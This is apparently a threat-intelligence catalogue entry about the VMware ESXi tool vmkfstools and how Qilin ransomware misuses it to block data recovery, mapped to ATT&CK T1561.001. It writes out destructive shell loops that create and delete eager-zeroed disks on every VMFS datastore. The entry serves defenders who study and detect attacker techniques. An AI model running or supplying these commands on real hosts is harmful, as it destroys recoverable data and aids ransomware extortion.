.. /vmkfstools

Star

A command-line utility in VMware ESXi used to manage and interact with VMFS (Virtual Machine File System) volumes.

• https://www.bleepingcomputer.com/news/security/linux-version-of-qilin-ransomware-focuses-on-vmware-esxi/
• https://www.shadowstackre.com/analysis/qilin

Inhibit Recovery

1. Create eager-zeroed thick virtual disk at the specified location without displaying any output.

   vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null

   Use case

   Adversary uses vmfstools to create and immediately delete a 10MB eager zeroed thick disk on every datastore on the ESXi host. This will effectively overwrite contents of the disk.

   Privileges required

   Administrator

   Operating systems

   ESXi

   Additional Procedural Examples

   • for I in $(esxcli storage filesystem list |grep 'VMFS-5' |awk '{print $1}'); do vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null; done

   • for I in $(esxcli storage filesystem list |grep 'VMFS-6' |awk '{print $1}'); do vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null; done

   ATT&CK® technique

   T1561.001

   
   

   Tags

   E-Crime: Qilin

   Aka Agenda and is written in Golang. Uses double extortion technique and target large enterprises and high-value targets